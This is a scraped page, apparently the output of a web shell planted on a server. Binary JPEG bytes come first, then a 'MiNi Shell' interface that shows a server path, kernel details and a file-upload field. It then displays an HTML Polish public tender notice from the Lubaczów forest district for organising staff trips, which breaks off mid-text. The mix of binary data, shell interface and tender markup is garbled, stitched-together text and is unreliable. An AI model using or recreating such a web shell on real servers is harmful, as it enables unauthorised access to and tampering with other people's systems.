JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240419/0029404301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa organizacja wycieczek turystycznych dla pracowników Nadleśnictwa Lubaczów – II postępowanie przetargowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO LUBACZÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650016495</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubaczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lubaczow@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lubaczow.krosno.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa organizacja wycieczek turystycznych dla pracowników Nadleśnictwa Lubaczów – II postępowanie przetargowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7ebf3fa-fe44-11ee-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00294043</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_lubaczow/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_lubaczow/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2. Komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się przy użyciu platformy: platformazakupowa.pl/ (dalej jako platforma) znajdującej się pod adresem<br/>https://platformazakupowa.pl/pn/lasy_lubaczow oraz poczty elektronicznej z zastrzeżeniem, że złożenie oferty, oświadczenia o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także innych oświadczeń lub dokumentów składanych<br/>wraz z ofertą następuje wyłącznie przy użyciu Platformy.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z platformy<br/>https://platformazakupowa.pl/strona/45-instrukcje oraz w Regulaminie korzystania z platformy „platformazakupowa.pl”, dostępnym<br/>pod adresem: https://platformazakupowa.pl/strona/1-regulamin<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod wskazanym wyżej adresem internetowym, w<br/>zakładce „Regulamin” oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją składania ofert/wniosków dostępną<br/>pod wskazanym wyżej adresem internetowym i stosować się do niej.<br/>4. Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub<br/>spakowanych folderów (pliki można spakować zgodnie z ust. 8 instrukcji dla wykonawców) przy maksymalnej wielkości<br/>pojedynczego pliku 150 MB.<br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich złożenia na platformie:<br/>https://platformazakupowa.pl/pn/lasy_lubaczow lub ich otrzymania przez Zamawiającego na wskazany w pkt 10.1_SWZ adres email,<br/>z zastrzeżeniem, że Oferta może zostać złożona wyłącznie przy użyciu platformy:<br/>https://platformazakupowa.pl/pn/lasy_lubaczow.<br/>5. Zamawiający, zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), niniejszym określa wymagania<br/>techniczne umożliwiające korzystanie z udostępnianej przez Zamawiającego platformy:<br/>https://platformazakupowa.pl/pn/lasy_lubaczow tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 10 (uwaga Windows 7 nie posiada wsparcia producenta), Mac Os x 10 4, Linux, lub<br/>ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików.pdf,<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu oraz inne<br/>oświadczenia lub dokumenty składane wraz z ofertą (np. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, które dostawy wykonają poszczególni Wykonawcy, zobowiązanie podmiotu udostępniającego zasoby, pełnomocnictwa<br/>– jeżeli dotyczy), w formie elektronicznej (postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119, str. 1 ze zm. – dalej „RODO”) Zamawiający informuje, iż<br/>administratorem danych osobowych jest Nadleśnictwo Lubaczów, ul. Słowackiego 20,<br/>37-600 Lubaczów. Administrator wyznaczył Inspektora Ochrony Danych Osobowych<br/>p. Sebastian Strzech, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za<br/>pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich wniesienia.<br/>4. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego<br/>oraz jego rozstrzygnięciem, jak również, po wybraniu Wykonawcy – na podstawie art. 6 ust. 1 lit. b RODO w celu zawarcia umowy w<br/>sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego<br/>archiwizacji.<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o<br/>art. 18 – 19 oraz 74 – 76 PZP.<br/>6. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje<br/>cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>7. Niezależnie od postanowień pkt 1.6. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe<br/>będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>8. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia mogą zostać przekazane podmiotom przetwarzającym dane<br/>w imieniu administratora danych osobowych np. podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>firmom zapewniającym niszczenie materiałów itp.<br/>9. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany, w tym<br/>również w formie profilowania<br/>Pozostałe wymagania zostały opisane w pkt 32 SWZ do niniejszego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.166.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługa kompleksowej organizacji 8 dniowej wycieczki turystycznej do Grecji w terminie 14-30 września 2024r. dla 30<br/>pracowników Nadleśnictwa Lubaczów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55100000-1 - Usługi hotelarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <p class="mb-0">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość zwiększenia ilości osób o 10 uczestników<br/>wycieczki względem oferty Wykonawcy. Minimalny poziom zamówienia jaki na pewno<br/>zostanie zrealizowany to 30 uczestników wycieczki do Grecji oraz 40 uczestników wycieczki<br/>do Wiednia <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone przez<br/>zamawiającego, pozostałe oferty oceniane będą punktowo.<br/>2. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich<br/>znaczeniem:<br/>a) Cena ofertowa brutto – 60%<br/>b) obniżenie ceny za dodatkowych uczestników wycieczki - 40%<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższym bilansem punktów<br/>w wyspecyfikowanych kryteriach oceny ofert. Punkty przyznawane za podane<br/>kryterium będą liczone według następującego wzoru:<br/>Nr<br/>kryterium:<br/>Wzór:<br/>I - Cena Liczba punktów = ( Cmin/Cof ) x 60<br/>gdzie:<br/>- Cmin - najniższa cena brutto spośród wszystkich<br/>ofert nie podlegających odrzuceniu<br/>- Cof - cena brutto podana w ofercie podlegającej ocenie<br/>II – Obniżenie<br/>ceny za<br/>dodatkowych<br/>uczestników<br/>wycieczki<br/>Na podstawie niniejszego kryterium Zamawiający będzie<br/>oceniał zadeklarowaną przez Wykonawcę kwotę<br/>obniżenia ceny za dodatkową liczbę uczestników<br/>wycieczki:<br/>Zadanie częściowe nr 1 wycieczka do Grecji.<br/>Zamawiający przyzna odpowiednio następującą liczbę<br/>punktów:<br/>− 0 pkt. (wariant A) – Wykonawca nie obniży ceny za<br/>dodatkowych uczestników<br/>− 20 pkt (wariant B). – Wykonawca obniży cenę o kwotę<br/>120,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 33-37 osób i o 220,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników<br/>pow. 38 osób<br/>− 40 pkt. (wariant C) – Wykonawca obniży cenę o kwotę<br/>150,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 33-37 osób i o 250,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników<br/>pow. 38 osób<br/>Zadanie częściowe nr 2 wycieczka do Wiednia<br/>Zamawiający przyzna odpowiednio następującą liczbę<br/>punktów:<br/>− 0 pkt. (wariant A) – Wykonawca nie obniży ceny za<br/>dodatkowych uczestników)<br/>− 20 pkt. (wariant B) – Wykonawca obniży cenę o kwotę<br/>40,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 41-45 osób i o 80,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników 46-<br/>50 osób<br/>− 40 pkt. (wariant C) – Wykonawca obniży cenę o kwotę<br/>60,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 41-45 osób i o 120,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników 46-<br/>50 osób<br/>UWAGA: Brak zaznaczenia pola w punkcie 1d)<br/>Formularza ofertowego spowoduje, że Wykonawca<br/>otrzyma „0” (zero) punktów w niniejszym kryterium..<br/>4. Najkorzystniejsza oferta może uzyskać maksymalnie 100 punktów, w tym:<br/>- maksymalna ilość punktów za cenę (60pkt) otrzymuje Wykonawca z najniższa ceną<br/>oferty, kolejne oferty będą oceniane wg powyższego wzoru,- maksymalną ilość punktów za obniżenie ceny za dodatkowych uczestników wycieczki<br/>(40 pkt) otrzymuje Wykonawca za zaoferowanie do 60,00 zł obniżki ceny wycieczki<br/>dla każdego uczestnika ponad stan 30 osób – Grecja, 40 osób – Wiedeń (maksymalna<br/>liczba uczestników 35 osoby Grecja i 45 osób Wiedeń).<br/>5. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>6. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę<br/>danej oferty.<br/>K1 + K2 = suma punktów<br/>K1 - ilość punktów uzyskanych w kryterium cena<br/>K2 - ilość punktów uzyskanych w kryterium obniżenie ceny za dodatkowych uczestników<br/>7. Oferta może uzyskać maksymalnie 100 punktów.<br/>8. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>9. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę<br/>danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">obniżenie ceny za dodatkowych uczestników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługa kompleksowej organizacji 4 dniowej wycieczki turystycznej do Wiednia w terminie 12-25 lipca 2024r. dla 40 pracowników Nadleśnictwa Lubaczów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55100000-1 - Usługi hotelarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <p class="mb-0">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość zwiększenia ilości osób o 10 uczestników<br/>wycieczki względem oferty Wykonawcy. Minimalny poziom zamówienia jaki na pewno zostanie zrealizowany to 30 uczestników wycieczki do Grecji oraz 40 uczestników wycieczki do Wiednia <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone przez<br/>zamawiającego, pozostałe oferty oceniane będą punktowo.<br/>2. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich<br/>znaczeniem:<br/>a) Cena ofertowa brutto – 60%<br/>b) obniżenie ceny za dodatkowych uczestników wycieczki - 40%<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższym bilansem punktów<br/>w wyspecyfikowanych kryteriach oceny ofert. Punkty przyznawane za podane<br/>kryterium będą liczone według następującego wzoru:<br/>Nr<br/>kryterium:<br/>Wzór:<br/>I - Cena Liczba punktów = ( Cmin/Cof ) x 60<br/>gdzie:<br/>- Cmin - najniższa cena brutto spośród wszystkich<br/>ofert nie podlegających odrzuceniu<br/>- Cof - cena brutto podana w ofercie podlegającej ocenie<br/>II – Obniżenie<br/>ceny za<br/>dodatkowych<br/>uczestników<br/>wycieczki<br/>Na podstawie niniejszego kryterium Zamawiający będzie<br/>oceniał zadeklarowaną przez Wykonawcę kwotę<br/>obniżenia ceny za dodatkową liczbę uczestników<br/>wycieczki:<br/>Zadanie częściowe nr 1 wycieczka do Grecji.<br/>Zamawiający przyzna odpowiednio następującą liczbę<br/>punktów:<br/>− 0 pkt. (wariant A) – Wykonawca nie obniży ceny za<br/>dodatkowych uczestników<br/>− 20 pkt (wariant B). – Wykonawca obniży cenę o kwotę<br/>120,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 33-37 osób i o 220,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników<br/>pow. 38 osób<br/>− 40 pkt. (wariant C) – Wykonawca obniży cenę o kwotę<br/>150,00 zł dla każdego uczestnika wycieczki, w przypadku<br/>liczby uczestników 33-37 osób i o 250,00 zł dla każdego<br/>uczestnika wycieczki, w przypadku liczby uczestników<br/>pow. 38 osób<br/>Zadanie częściowe nr 2 wycieczka do Wiednia<br/>Zamawiający przyzna odpowiednio następującą liczbę<br/>punktów:<br/>− 0 pkt. (wariant A) – 